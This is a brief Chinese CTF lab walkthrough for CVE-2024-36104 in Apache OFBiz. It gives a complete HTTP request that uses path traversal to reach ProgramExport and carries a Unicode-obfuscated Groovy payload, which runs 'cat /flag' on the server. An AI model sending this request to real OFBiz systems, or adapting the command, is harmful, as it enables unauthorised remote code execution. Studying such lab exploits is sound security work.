春秋云境Apache OFBiz 目录遍历致代码执行漏洞 CVE-2024-36104

1.拿到环境之后，访问/accounting/control/main

需要抓包把Headers 的 Host改成 localhost，否则报错：

 2.开启burp，打开内嵌的浏览器，修改请求payload（这里的端口号要按你自己下发的来）为：

`POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1 Host: localhost:36646 Cookie: JSESSIONID=2A2143A74051B80F86479CE4543B034E.jvm1; OFBiz.Visitor=10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 OpenWave/93.4.3797.32 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Sec-Ch-Ua-Platform: "Windows" Sec-Ch-Ua: "Google Chrome";v="125", "Chromium";v="125", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Priority: u=0, i Te: trailers Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 304

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
`

 

 

3.在下面响应包里面搜索flag，即可ctf